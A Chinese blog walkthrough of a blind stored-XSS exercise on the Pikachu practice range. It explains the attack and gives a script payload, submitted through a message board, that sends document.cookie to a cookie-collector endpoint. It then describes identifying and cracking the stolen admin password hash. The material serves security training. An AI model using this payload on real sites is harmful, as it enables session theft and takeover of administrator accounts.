Pikachu靶场:XSS盲打

Pikachu靶场:XSS盲打

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

●xss盲打也是属于存储型XSS类型

盲打的意思是无法直接在前端看到反馈效果。

xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。

形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS

XSS盲打测试流程

1.在目标站点上找到输入点,比如查询接口,留言板等;

2.输入一组“特殊字符+唯一识别字符”,点击提交后,等待目标上线触发;

3.在XSS后台中查看结果

具体操作

1.在目标站点上找到输入点,比如留言板,问卷调查等

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-glgE5c9N-1618649901720)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416171244549.png)]

2.构造payload进行注入

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zBXz3p2Y-1618649901723)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416172234128.png)]

3.后台等待对方登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1xfS135Y-1618649901724)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416182751724.png)]

利用hash-identifier判断加密类型

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yWFBD5iD-1618649901725)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416191129619.png)]

利用在线解密进行解密

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yN7f2TiC-1618649901727)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210416191217118.png)]

总结

XSS盲打的攻击目标是后台管理员,在前端利用输入接口进行攻击,输入的js代码被存储到了数据库中,在管理员登录的时候被触发。盗取管理员cookie后即刻进行管理员密码破解。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值